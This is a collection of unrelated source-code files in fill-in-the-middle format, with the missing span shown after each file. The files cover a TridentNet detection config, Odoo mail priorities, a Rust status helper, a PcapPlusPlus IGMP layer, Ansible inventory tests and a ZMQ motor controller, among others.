prefix = "pretrain_model/resnet%s_v1b" % BackboneParam.depth
epoch = 0
fixed_param = ["conv0", "stage1", "gamma", "beta"]
class OptimizeParam:
class optimizer:
type = "sgd"
lr = 0.01 / 8 * len(KvstoreParam.gpus) * KvstoreParam.batch_image
momentum = 0.9
wd = 0.0001
clip_gradient = 5
class schedule:
begin_epoch = 0
end_epoch = 12
lr_iter = [120000 * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image),
160000 * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image)]
class warmup:
type = "gradual"
lr = 0.0
iter = 3000 * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image)
class TestParam:
min_det_score = 0.001
max_det_per_image = 100
process_roidb = lambda x: x
if Trident.test_scaleaware:
process_output = lambda x, y: process_branch_outputs(
x, Trident.num_branch, Trident.valid_ranges, Trident.valid_ranges_on_origin)
else:
process_output = lambda x, y: x
process_rpn_output = lambda x, y: process_branch_rpn_outputs(x, Trident.num_branch)
class model:
prefix = "experiments/{}/checkpoint".format(General.name)
epoch = OptimizeParam.schedule.end_epoch
class nms:
type = "nms"
thr = 0.5
class coco:
annotation = "data/coco/annotations/instances_minival2014.json"
# data processing
class NormParam:
mean = tuple(i * 255 for i in (0.485, 0.456, 0.406)) # RGB order
std = tuple(i * 255 for i in (0.229, 0.224, 0.225))
class ResizeParam:
short = 800
long = 1200 if is_train else 2000
class PadParam:
short = 800
long = 1200 if is_train else 2000
max_num_gt = 100
class ScaleRange:
valid_ranges = Trident.valid_ranges
cal_on_origin = Trident.valid_ranges_on_origin # True: valid_ranges on origin image scale / valid_ranges on resized image scale
class AnchorTarget2DParam:
class generate:<|fim▁hole|> aspects = (0.5, 1.0, 2.0)
class assign:
allowed_border = 0
pos_thr = 0.7
neg_thr = 0.3
min_pos_thr = 0.0
class sample:
image_anchor = 256
pos_fraction = 0.5
class trident:
invalid_anchor_threshd = 0.3
class RenameParam:
mapping = dict(image="data")
from core.detection_input import ReadRoiRecord, Resize2DImageBbox, \
ConvertImageFromHwcToChw, Flip2DImageBbox, Pad2DImageBbox, \
RenameRecord, Norm2DImage
from models.tridentnet.input import ScaleAwareRange, TridentAnchorTarget2D
if is_train:
transform = [
ReadRoiRecord(None),
Norm2DImage(NormParam),
Resize2DImageBbox(ResizeParam),
Flip2DImageBbox(),
Pad2DImageBbox(PadParam),
ConvertImageFromHwcToChw(),
ScaleAwareRange(ScaleRange),
TridentAnchorTarget2D(AnchorTarget2DParam),
RenameRecord(RenameParam.mapping)
]
data_name = ["data", "im_info", "gt_bbox"]
if Trident.train_scaleaware:
data_name.append("valid_ranges")
label_name = ["rpn_cls_label", "rpn_reg_target", "rpn_reg_weight"]
else:
transform = [
ReadRoiRecord(None),
Norm2DImage(NormParam),
Resize2DImageBbox(ResizeParam),
ConvertImageFromHwcToChw(),
RenameRecord(RenameParam.mapping)
]
data_name = ["data", "im_info", "im_id", "rec_id"]
label_name = []
import core.detection_metric as metric
rpn_acc_metric = metric.AccWithIgnore(
"RpnAcc",
["rpn_cls_loss_output"],
["rpn_cls_label"]
)
rpn_l1_metric = metric.L1(
"RpnL1",
["rpn_reg_loss_output"],
["rpn_cls_label"]
)
# for bbox, the label is generated in network so it is an output
box_acc_metric = metric.AccWithIgnore(
"RcnnAcc",
["bbox_cls_loss_output", "bbox_label_blockgrad_output"],
[]
)
box_l1_metric = metric.L1(
"RcnnL1",
["bbox_reg_loss_output", "bbox_label_blockgrad_output"],
[]
)
metric_list = [rpn_acc_metric, rpn_l1_metric, box_acc_metric, box_l1_metric]
return General, KvstoreParam, RpnParam, RoiParam, BboxParam, DatasetParam, \
ModelParam, OptimizeParam, TestParam, \
transform, data_name, label_name, metric_list<|fim▁end|> | short = 800 // 16
long = 1200 // 16
stride = 16
scales = (2, 4, 8, 16, 32) |
<|file_name|>mail_compose_message.py<|end_file_name|><|fim▁begin|># Copyright 2018 ACSONE SA/NV
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import ast
from odoo import api, exceptions, models, _
class MailComposeMessage(models.TransientModel):
_inherit = 'mail.compose.message'
@api.model
def _get_priorities(self):
"""
Load priorities from parameters.
:return: dict
"""
key = 'mail.sending.job.priorities'
try:
priorities = ast.literal_eval(<|fim▁hole|> # Catch exception to have a understandable error message
except (ValueError, SyntaxError):
raise exceptions.UserError(
_("Error to load the system parameter (%s) "
"of priorities") % key)
# As literal_eval can transform str into any format, check if we
# have a real dict
if not isinstance(priorities, dict):
raise exceptions.UserError(
_("Error to load the system parameter (%s) of priorities.\n"
"Invalid dictionary") % key)
return priorities
@api.multi
def send_mail(self, auto_commit=False):
"""
Set a priority on subsequent generated mail.mail, using priorities
set into the configuration.
:return: dict/action
"""
active_ids = self.env.context.get('active_ids')
default_priority = self.env.context.get('default_mail_job_priority')
if active_ids and not default_priority:
priorities = self._get_priorities()
size = len(active_ids)
limits = [lim for lim in priorities if lim <= size]
if limits:
prio = priorities.get(max(limits))
self = self.with_context(default_mail_job_priority=prio)
return super().send_mail(auto_commit=auto_commit)<|fim▁end|> | self.env['ir.config_parameter'].sudo().get_param(
key, default='{}')) |
<|file_name|>status.rs<|end_file_name|><|fim▁begin|>use bytes::Bytes;
use crate::HeaderValue;
pub const STATUS_200: HeaderValue =
unsafe { HeaderValue::from_bytes_unchecked(Bytes::from_static(b"200")) };
pub const STATUS_404: HeaderValue =
unsafe { HeaderValue::from_bytes_unchecked(Bytes::from_static(b"404")) };
pub const STATUS_500: HeaderValue =
unsafe { HeaderValue::from_bytes_unchecked(Bytes::from_static(b"500")) };
pub fn status_to_header_value(code: u32) -> HeaderValue {<|fim▁hole|> 200 => STATUS_200,
404 => STATUS_404,
500 => STATUS_500,
s => HeaderValue::from_bytes(Bytes::from(format!("{}", s)))
.map_err(|(_, e)| e)
.unwrap(),
}
}<|fim▁end|> | match code { |
<|file_name|>RevealableBlock.ts<|end_file_name|><|fim▁begin|>import { Renderer } from '../Rendering/Renderer'
import { Heading } from './Heading'
import { RichOutlineSyntaxNode } from './RichOutlineSyntaxNode'
export class RevealableBlock extends RichOutlineSyntaxNode {
render(renderer: Renderer): string {<|fim▁hole|> // table of contents.
descendantsToIncludeInTableOfContents(): Heading[] {
return []
}
protected readonly REVEALABLE_BLOCK = undefined
}<|fim▁end|> | return renderer.revealableBlock(this)
}
// As a rule, we don't want to include any revealable (i.e. initially hidden) headings in the |
<|file_name|>Uniques.java<|end_file_name|><|fim▁begin|>/**
* Copyright (C) 2006-2020 Talend Inc. - www.talend.com
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.talend.sdk.component.api.configuration.constraint;
import static java.lang.annotation.ElementType.FIELD;<|fim▁hole|>import static java.lang.annotation.ElementType.PARAMETER;
import static java.lang.annotation.RetentionPolicy.RUNTIME;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;
import java.util.Collection;
import org.talend.sdk.component.api.configuration.constraint.meta.Validation;
import org.talend.sdk.component.api.meta.Documentation;
@Validation(expectedTypes = Collection.class, name = "uniqueItems")
@Target({ FIELD, PARAMETER })
@Retention(RUNTIME)
@Documentation("Ensure the elements of the collection must be distinct (kind of set).")
public @interface Uniques {
}<|fim▁end|> | |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>"""
__init__.py
ist303-miye
Copyright (C) 2017
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; either version 2 of the License, or (at your option) any later<|fim▁hole|>ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc., 59 Temple
Place, Suite 330, Boston, MA 02111-1307 USA
"""
from .cwebview import *<|fim▁end|> | version.
This program is distributed in the hope that it will be useful, but WITHOUT |
<|file_name|>IgmpLayer.cpp<|end_file_name|><|fim▁begin|>#define LOG_MODULE PacketLogModuleIgmpLayer
#include "IgmpLayer.h"
#include "PacketUtils.h"
#include "Logger.h"
#include <string.h>
#include "EndianPortable.h"
namespace pcpp
{
/*************
* IgmpLayer
*************/
IgmpLayer::IgmpLayer(IgmpType type, const IPv4Address& groupAddr, uint8_t maxResponseTime, ProtocolType igmpVer)
{
m_DataLen = getHeaderSizeByVerAndType(igmpVer, type);
m_Data = new uint8_t[m_DataLen];
memset(m_Data, 0, m_DataLen);
m_Protocol = igmpVer;
setType(type);
if (groupAddr.isValid())
setGroupAddress(groupAddr);
getIgmpHeader()->maxResponseTime = maxResponseTime;
}
void IgmpLayer::setGroupAddress(const IPv4Address& groupAddr)
{
igmp_header* hdr = getIgmpHeader();
hdr->groupAddress = groupAddr.toInt();
}
IgmpType IgmpLayer::getType() const
{
uint8_t type = getIgmpHeader()->type;
if (type < (uint8_t)IgmpType_MembershipQuery ||
(type > (uint8_t)IgmpType_LeaveGroup && type < (uint8_t)IgmpType_MulticastTracerouteResponse) ||
(type > (uint8_t)IgmpType_MulticastTraceroute && type < (uint8_t)IgmpType_MembershipReportV3) ||
(type > (uint8_t)IgmpType_MembershipReportV3 && type < (uint8_t)IgmpType_MulticastRouterAdvertisement) ||
type > IgmpType_MulticastRouterTermination)
return IgmpType_Unknown;
return (IgmpType)type;
}
void IgmpLayer::setType(IgmpType type)
{
if (type == IgmpType_Unknown)
return;
igmp_header* hdr = getIgmpHeader();
hdr->type = type;
}
ProtocolType IgmpLayer::getIGMPVerFromData(uint8_t* data, size_t dataLen, bool& isQuery)
{
isQuery = false;
if (dataLen < 8 || data == NULL)
return UnknownProtocol;
switch ((int)data[0])
{
case IgmpType_MembershipReportV2:
case IgmpType_LeaveGroup:
return IGMPv2;
case IgmpType_MembershipReportV1:
return IGMPv1;
case IgmpType_MembershipReportV3:
return IGMPv3;
case IgmpType_MembershipQuery:
{
isQuery = true;
if (dataLen >= sizeof(igmpv3_query_header))
return IGMPv3;
if (data[1] == 0)
return IGMPv1;
else
return IGMPv2;
}
default:
return UnknownProtocol;
}
}
uint16_t IgmpLayer::calculateChecksum()
{
ScalarBuffer<uint16_t> buffer;
buffer.buffer = (uint16_t*)getIgmpHeader();
buffer.len = getHeaderLen();
return computeChecksum(&buffer, 1);
}
size_t IgmpLayer::getHeaderSizeByVerAndType(ProtocolType igmpVer, IgmpType igmpType) const
{
if (igmpVer == IGMPv1 || igmpVer == IGMPv2)
return sizeof(igmp_header);
if (igmpVer == IGMPv3)
{
if (igmpType == IgmpType_MembershipQuery)
return sizeof(igmpv3_query_header);
else if (igmpType == IgmpType_MembershipReportV3)
return sizeof(igmpv3_report_header);
}
return 0;
}
std::string IgmpLayer::toString() const
{
std::string igmpVer = "";
switch (getProtocol())
{
case IGMPv1:
igmpVer = "1";
break;
case IGMPv2:
igmpVer = "2";
break;
default:
igmpVer = "3";
}
std::string msgType;
switch (getType())
{
case IgmpType_MembershipQuery:
msgType = "Membership Query";
break;
case IgmpType_MembershipReportV1:
msgType = "Membership Report";
break;
case IgmpType_DVMRP:
msgType = "DVMRP";
break;
case IgmpType_P1Mv1:
msgType = "PIMv1";
break;
case IgmpType_CiscoTrace:
msgType = "Cisco Trace";
break;
case IgmpType_MembershipReportV2:
msgType = "Membership Report";
break;
case IgmpType_LeaveGroup:
msgType = "Leave Group";
break;
<|fim▁hole|> case IgmpType_MulticastTraceroute:
msgType = "Multicast Traceroute";
break;
case IgmpType_MembershipReportV3:
msgType = "Membership Report";
break;
case IgmpType_MulticastRouterAdvertisement:
msgType = "Multicast Router Advertisement";
break;
case IgmpType_MulticastRouterSolicitation:
msgType = "Multicast Router Solicitation";
break;
case IgmpType_MulticastRouterTermination:
msgType = "Multicast Router Termination";
break;
default:
msgType = "Unknown";
break;
}
std::string result = "IGMPv" + igmpVer + " Layer, " + msgType + " message";
return result;
}
/*************
* IgmpV1Layer
*************/
void IgmpV1Layer::computeCalculateFields()
{
igmp_header* hdr = getIgmpHeader();
hdr->checksum = 0;
hdr->checksum = htobe16(calculateChecksum());
hdr->maxResponseTime = 0;
}
/*************
* IgmpV2Layer
*************/
void IgmpV2Layer::computeCalculateFields()
{
igmp_header* hdr = getIgmpHeader();
hdr->checksum = 0;
hdr->checksum = htobe16(calculateChecksum());
}
/******************
* IgmpV3QueryLayer
******************/
IgmpV3QueryLayer::IgmpV3QueryLayer(uint8_t* data, size_t dataLen, Layer* prevLayer, Packet* packet) :
IgmpLayer(data, dataLen, prevLayer, packet, IGMPv3)
{
}
IgmpV3QueryLayer::IgmpV3QueryLayer(const IPv4Address& multicastAddr, uint8_t maxResponseTime, uint8_t s_qrv) :
IgmpLayer(IgmpType_MembershipQuery, multicastAddr, maxResponseTime, IGMPv3)
{
getIgmpV3QueryHeader()->s_qrv = s_qrv;
}
uint16_t IgmpV3QueryLayer::getSourceAddressCount() const
{
return be16toh(getIgmpV3QueryHeader()->numOfSources);
}
IPv4Address IgmpV3QueryLayer::getSourceAddressAtIndex(int index) const
{
uint16_t numOfSources = getSourceAddressCount();
if (index < 0 || index >= numOfSources)
return IPv4Address();
// verify numOfRecords is a reasonable number that points to data within the packet
int ptrOffset = index * sizeof(uint32_t) + sizeof(igmpv3_query_header);
if (ptrOffset + sizeof(uint32_t) > getDataLen())
return IPv4Address();
uint8_t* ptr = m_Data + ptrOffset;
return IPv4Address(*(uint32_t*)ptr);
}
size_t IgmpV3QueryLayer::getHeaderLen() const
{
uint16_t numOfSources = getSourceAddressCount();
int headerLen = numOfSources * sizeof(uint32_t) + sizeof(igmpv3_query_header);
// verify numOfRecords is a reasonable number that points to data within the packet
if ((size_t)headerLen > getDataLen())
return getDataLen();
return (size_t)headerLen;
}
void IgmpV3QueryLayer::computeCalculateFields()
{
igmpv3_query_header* hdr = getIgmpV3QueryHeader();
hdr->checksum = 0;
hdr->checksum = htobe16(calculateChecksum());
}
bool IgmpV3QueryLayer::addSourceAddress(const IPv4Address& addr)
{
return addSourceAddressAtIndex(addr, getSourceAddressCount());
}
bool IgmpV3QueryLayer::addSourceAddressAtIndex(const IPv4Address& addr, int index)
{
uint16_t sourceAddrCount = getSourceAddressCount();
if (index < 0 || index > (int)sourceAddrCount)
{
PCPP_LOG_ERROR("Cannot add source address at index " << index << ", index is out of bounds");
return false;
}
size_t offset = sizeof(igmpv3_query_header) + index * sizeof(uint32_t);
if (offset > getHeaderLen())
{
PCPP_LOG_ERROR("Cannot add source address at index " << index << ", index is out of packet bounds");
return false;
}
if (!extendLayer(offset, sizeof(uint32_t)))
{
PCPP_LOG_ERROR("Cannot add source address at index " << index << ", didn't manage to extend layer");
return false;
}
memcpy(m_Data + offset, addr.toBytes(), sizeof(uint32_t));
getIgmpV3QueryHeader()->numOfSources = htobe16(sourceAddrCount+1);
return true;
}
bool IgmpV3QueryLayer::removeSourceAddressAtIndex(int index)
{
uint16_t sourceAddrCount = getSourceAddressCount();
if (index < 0 || index > (int)sourceAddrCount-1)
{
PCPP_LOG_ERROR("Cannot remove source address at index " << index << ", index is out of bounds");
return false;
}
size_t offset = sizeof(igmpv3_query_header) + index * sizeof(uint32_t);
if (offset >= getHeaderLen())
{
PCPP_LOG_ERROR("Cannot remove source address at index " << index << ", index is out of packet bounds");
return false;
}
if (!shortenLayer(offset, sizeof(uint32_t)))
{
PCPP_LOG_ERROR("Cannot remove source address at index " << index << ", didn't manage to shorten layer");
return false;
}
getIgmpV3QueryHeader()->numOfSources = htobe16(sourceAddrCount-1);
return true;
}
bool IgmpV3QueryLayer::removeAllSourceAddresses()
{
size_t offset = sizeof(igmpv3_query_header);
size_t numOfBytesToShorted = getHeaderLen() - offset;
if (!shortenLayer(offset, numOfBytesToShorted))
{
PCPP_LOG_ERROR("Cannot remove all source addresses, didn't manage to shorten layer");
return false;
}
getIgmpV3QueryHeader()->numOfSources = 0;
return true;
}
/*******************
* IgmpV3ReportLayer
*******************/
uint16_t IgmpV3ReportLayer::getGroupRecordCount() const
{
return be16toh(getReportHeader()->numOfGroupRecords);
}
igmpv3_group_record* IgmpV3ReportLayer::getFirstGroupRecord() const
{
// check if there are group records at all
if (getHeaderLen() <= sizeof(igmpv3_report_header))
return NULL;
uint8_t* curGroupPtr = m_Data + sizeof(igmpv3_report_header);
return (igmpv3_group_record*)curGroupPtr;
}
igmpv3_group_record* IgmpV3ReportLayer::getNextGroupRecord(igmpv3_group_record* groupRecord) const
{
if (groupRecord == NULL)
return NULL;
// prev group was the last group
if ((uint8_t*)groupRecord + groupRecord->getRecordLen() - m_Data >= (int)getHeaderLen())
return NULL;
igmpv3_group_record* nextGroup = (igmpv3_group_record*)((uint8_t*)groupRecord + groupRecord->getRecordLen());
return nextGroup;
}
void IgmpV3ReportLayer::computeCalculateFields()
{
igmpv3_report_header* hdr = getReportHeader();
hdr->checksum = 0;
hdr->checksum = htobe16(calculateChecksum());
}
igmpv3_group_record* IgmpV3ReportLayer::addGroupRecordAt(uint8_t recordType, const IPv4Address& multicastAddress, const std::vector<IPv4Address>& sourceAddresses, int offset)
{
if (offset > (int)getHeaderLen())
{
PCPP_LOG_ERROR("Cannot add group record, offset is out of layer bounds");
return NULL;
}
size_t groupRecordSize = sizeof(igmpv3_group_record) + sizeof(uint32_t)*sourceAddresses.size();
if (!extendLayer(offset, groupRecordSize))
{
PCPP_LOG_ERROR("Cannot add group record, cannot extend layer");
return NULL;
}
uint8_t* groupRecordBuffer = new uint8_t[groupRecordSize];
memset(groupRecordBuffer, 0, groupRecordSize);
igmpv3_group_record* newGroupRecord = (igmpv3_group_record*)groupRecordBuffer;
newGroupRecord->multicastAddress = multicastAddress.toInt();
newGroupRecord->recordType = recordType;
newGroupRecord->auxDataLen = 0;
newGroupRecord->numOfSources = htobe16(sourceAddresses.size());
int srcAddrOffset = 0;
for (std::vector<IPv4Address>::const_iterator iter = sourceAddresses.begin(); iter != sourceAddresses.end(); iter++)
{
memcpy(newGroupRecord->sourceAddresses + srcAddrOffset, iter->toBytes(), sizeof(uint32_t));
srcAddrOffset += sizeof(uint32_t);
}
memcpy(m_Data + offset, groupRecordBuffer, groupRecordSize);
delete[] groupRecordBuffer;
getReportHeader()->numOfGroupRecords = htobe16(getGroupRecordCount() + 1);
return (igmpv3_group_record*)(m_Data + offset);
}
igmpv3_group_record* IgmpV3ReportLayer::addGroupRecord(uint8_t recordType, const IPv4Address& multicastAddress, const std::vector<IPv4Address>& sourceAddresses)
{
return addGroupRecordAt(recordType, multicastAddress, sourceAddresses, (int)getHeaderLen());
}
igmpv3_group_record* IgmpV3ReportLayer::addGroupRecordAtIndex(uint8_t recordType, const IPv4Address& multicastAddress, const std::vector<IPv4Address>& sourceAddresses, int index)
{
int groupCnt = (int)getGroupRecordCount();
if (index < 0 || index > groupCnt)
{
PCPP_LOG_ERROR("Cannot add group record, index " << index << " out of bounds");
return NULL;
}
size_t offset = sizeof(igmpv3_report_header);
igmpv3_group_record* curRecord = getFirstGroupRecord();
for (int i = 0; i < index; i++)
{
if (curRecord == NULL)
{
PCPP_LOG_ERROR("Cannot add group record, cannot find group record at index " << i);
return NULL;
}
offset += curRecord->getRecordLen();
curRecord = getNextGroupRecord(curRecord);
}
return addGroupRecordAt(recordType, multicastAddress, sourceAddresses, (int)offset);
}
bool IgmpV3ReportLayer::removeGroupRecordAtIndex(int index)
{
int groupCnt = (int)getGroupRecordCount();
if (index < 0 || index >= groupCnt)
{
PCPP_LOG_ERROR("Cannot remove group record, index " << index << " is out of bounds");
return false;
}
size_t offset = sizeof(igmpv3_report_header);
igmpv3_group_record* curRecord = getFirstGroupRecord();
for (int i = 0; i < index; i++)
{
if (curRecord == NULL)
{
PCPP_LOG_ERROR("Cannot remove group record at index " << index << ", cannot find group record at index " << i);
return false;
}
offset += curRecord->getRecordLen();
curRecord = getNextGroupRecord(curRecord);
}
if (!shortenLayer((int)offset, curRecord->getRecordLen()))
{
PCPP_LOG_ERROR("Cannot remove group record at index " << index << ", cannot shorted layer");
return false;
}
getReportHeader()->numOfGroupRecords = htobe16(groupCnt-1);
return true;
}
bool IgmpV3ReportLayer::removeAllGroupRecords()
{
int offset = (int)sizeof(igmpv3_report_header);
if (!shortenLayer(offset, getHeaderLen()-offset))
{
PCPP_LOG_ERROR("Cannot remove all group records, cannot shorted layer");
return false;
}
getReportHeader()->numOfGroupRecords = 0;
return true;
}
/*********************
* igmpv3_group_record
*********************/
uint16_t igmpv3_group_record::getSourceAddressCount() const
{
return be16toh(numOfSources);
}
IPv4Address igmpv3_group_record::getSourceAddressAtIndex(int index) const
{
uint16_t numOfRecords = getSourceAddressCount();
if (index < 0 || index >= numOfRecords)
return IPv4Address();
int offset = index * sizeof(uint32_t);
const uint8_t* ptr = sourceAddresses + offset;
return IPv4Address(*(uint32_t*)ptr);
}
size_t igmpv3_group_record::getRecordLen() const
{
uint16_t numOfRecords = getSourceAddressCount();
int headerLen = numOfRecords * sizeof(uint32_t) + sizeof(igmpv3_group_record);
return (size_t)headerLen;
}
}<|fim▁end|> | case IgmpType_MulticastTracerouteResponse:
msgType = "Multicast Traceroute Response";
break;
|
<|file_name|>Stochastic Utility.py<|end_file_name|><|fim▁begin|>from chowdren.writers.objects import ObjectWriter
from chowdren.common import get_animation_name, to_c, make_color<|fim▁hole|>
class Util(ObjectWriter):
class_name = 'Utility'
static = True
def write_init(self, writer):
pass
actions = make_table(StaticActionWriter, {
1 : 'SetRandomSeedToTimer'
})
conditions = make_table(StaticConditionWriter, {
})
expressions = make_table(StaticExpressionWriter, {
0 : 'IntGenerateRandom',
1 : 'GenerateRandom',
3 : 'Substr',
4 : 'Nearest',
6 : 'ModifyRange',
2 : 'Limit',
13 : 'IntNearest',
15 : 'IntModifyRange',
21 : 'ExpressionCompare',
22 : 'IntExpressionCompare',
23 : 'StrExpressionCompare',
8 : 'EuclideanMod',
12 : 'IntLimit',
24 : 'Approach',
18 : 'IntUberMod',
7 : 'Wave',
9 : 'UberMod',
11 : 'Mirror',
17 : 'IntEuclideanMod',
19 : 'IntInterpolate',
25 : 'IntApproach',
16 : 'IntWave',
10 : 'Interpolate'
})
def get_object():
return Util<|fim▁end|> |
from chowdren.writers.events import (StaticConditionWriter,
StaticActionWriter, StaticExpressionWriter, make_table) |
<|file_name|>Assembly_it.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE TS>
<TS version="2.0" language="it" sourcelanguage="en">
<context>
<name>AssemblyGui::Workbench</name>
<message>
<location filename="../../Workbench.cpp" line="+50"/>
<source>Assembly</source>
<translation>Assembly</translation>
</message>
</context>
<context><|fim▁hole|> <source>Assembly</source>
<translation>Assembly</translation>
</message>
<message>
<location line="+1"/>
<source>Constraint Axle...</source>
<translation>Vincolo assiale...</translation>
</message>
<message>
<location line="+1"/>
<source>set a axle constraint between two objects</source>
<translation>Imposta un vincolo assiale tra due oggetti</translation>
</message>
</context>
<context>
<name>Workbench</name>
<message>
<source>Assembly</source>
<translation type="obsolete">Assembly</translation>
</message>
</context>
</TS><|fim▁end|> | <name>CmdAssemblyConstraintAxle</name>
<message>
<location filename="../../Command.cpp" line="+42"/> |
<|file_name|>test_inventory.py<|end_file_name|><|fim▁begin|># Copyright 2015 Abhijit Menon-Sen <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import string
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch
from ansible.inventory.manager import InventoryManager, split_host_pattern
from ansible.vars.manager import VariableManager
from units.mock.loader import DictDataLoader
class TestInventory(unittest.TestCase):
patterns = {
'a': ['a'],
'a, b': ['a', 'b'],
'a , b': ['a', 'b'],
' a,b ,c[1:2] ': ['a', 'b', 'c[1:2]'],
'9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9,foo': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo'],
'foo[1:2]': ['foo[1:2]'],
'a::b': ['a::b'],
'a:b': ['a', 'b'],
' a : b ': ['a', 'b'],
'foo:bar:baz[1:2]': ['foo', 'bar', 'baz[1:2]'],
}
pattern_lists = [
[['a'], ['a']],
[['a', 'b'], ['a', 'b']],
[['a, b'], ['a', 'b']],
[['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9,foo'],
['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo']]
]
# pattern_string: [ ('base_pattern', (a,b)), ['x','y','z'] ]
# a,b are the bounds of the subscript; x..z are the results of the subscript
# when applied to string.ascii_letters.
subscripts = {
'a': [('a', None), list(string.ascii_letters)],
'a[0]': [('a', (0, None)), ['a']],
'a[1]': [('a', (1, None)), ['b']],
'a[2:3]': [('a', (2, 3)), ['c', 'd']],
'a[-1]': [('a', (-1, None)), ['Z']],<|fim▁hole|> }
ranges_to_expand = {
'a[1:2]': ['a1', 'a2'],
'a[1:10:2]': ['a1', 'a3', 'a5', 'a7', 'a9'],
'a[a:b]': ['aa', 'ab'],
'a[a:i:3]': ['aa', 'ad', 'ag'],
'a[a:b][c:d]': ['aac', 'aad', 'abc', 'abd'],
'a[0:1][2:3]': ['a02', 'a03', 'a12', 'a13'],
'a[a:b][2:3]': ['aa2', 'aa3', 'ab2', 'ab3'],
}
def setUp(self):
fake_loader = DictDataLoader({})
self.i = InventoryManager(loader=fake_loader, sources=[None])
def test_split_patterns(self):
for p in self.patterns:
r = self.patterns[p]
self.assertEqual(r, split_host_pattern(p))
for p, r in self.pattern_lists:
self.assertEqual(r, split_host_pattern(p))
def test_ranges(self):
for s in self.subscripts:
r = self.subscripts[s]
self.assertEqual(r[0], self.i._split_subscript(s))
self.assertEqual(
r[1],
self.i._apply_subscript(
list(string.ascii_letters),
r[0][1]
)
)
class InventoryDefaultGroup(unittest.TestCase):
def test_empty_inventory(self):
inventory = self._get_inventory('')
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
self.assertFalse(inventory.groups['all'].get_hosts())
self.assertFalse(inventory.groups['ungrouped'].get_hosts())
def test_ini(self):
self._test_default_groups("""
host1
host2
host3
[servers]
host3
host4
host5
""")
def test_ini_explicit_ungrouped(self):
self._test_default_groups("""
[ungrouped]
host1
host2
host3
[servers]
host3
host4
host5
""")
def _get_inventory(self, inventory_content):
fake_loader = DictDataLoader({__file__: inventory_content})
return InventoryManager(loader=fake_loader, sources=[__file__])
def _test_default_groups(self, inventory_content):
inventory = self._get_inventory(inventory_content)
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
all_hosts = set(host.name for host in inventory.groups['all'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3', 'host4', 'host5']), all_hosts)
ungrouped_hosts = set(host.name for host in inventory.groups['ungrouped'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3']), ungrouped_hosts)
servers_hosts = set(host.name for host in inventory.groups['servers'].get_hosts())
self.assertEqual(set(['host3', 'host4', 'host5']), servers_hosts)<|fim▁end|> | 'a[-2]': [('a', (-2, None)), ['Y']],
'a[48:]': [('a', (48, -1)), ['W', 'X', 'Y', 'Z']],
'a[49:]': [('a', (49, -1)), ['X', 'Y', 'Z']],
'a[1:]': [('a', (1, -1)), list(string.ascii_letters[1:])], |
<|file_name|>motorctrl.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import zmq
from zmq.eventloop import ioloop as ioloop_mod
import zmqdecorators
import time
SERVICE_NAME = "urpobot.motor"
SERVICE_PORT = 7575
SIGNALS_PORT = 7576
# How long to wait for new commands before stopping automatically
COMMAND_GRACE_TIME = 0.250
<|fim▁hole|> self.serial_port = serialport
self.input_buffer = ""
self.evthandler = ioloop_mod.IOLoop.instance().add_handler(self.serial_port.fileno(), self.handle_serial_event, ioloop_mod.IOLoop.instance().READ)
self.last_command_time = time.time()
self.pcb = ioloop_mod.PeriodicCallback(self.check_data_reveived, COMMAND_GRACE_TIME)
self.pcb.start()
def check_data_reveived(self, *args):
if (time.time() - self.last_command_time > COMMAND_GRACE_TIME):
self._setspeeds(0,0)
def _setspeeds(self, m1speed, m2speed):
self.serial_port.write("S%04X%04X\n" % ((m1speed & 0xffff), (m2speed & 0xffff)))
@zmqdecorators.method()
def setspeeds(self, resp, m1speed, m2speed):
self.last_command_time = time.time()
#print("Got speeds %s,%s" % (m1speed, m2speed))
self._setspeeds(m1speed, m2speed)
# TODO: actually handle ACK/NACK somehow (we need to read it from the serialport but we can't block while waiting for it...)
resp.send("ACK")
def handle_serial_event(self, fd, events):
# Copied from arbus that was thread based
if not self.serial_port.inWaiting():
# Don't try to read if there is no data, instead sleep (yield) a bit
time.sleep(0)
return
data = self.serial_port.read(1)
if len(data) == 0:
return
#print("DEBUG: data=%s" % data)
# Put the data into inpit buffer and check for CRLF
self.input_buffer += data
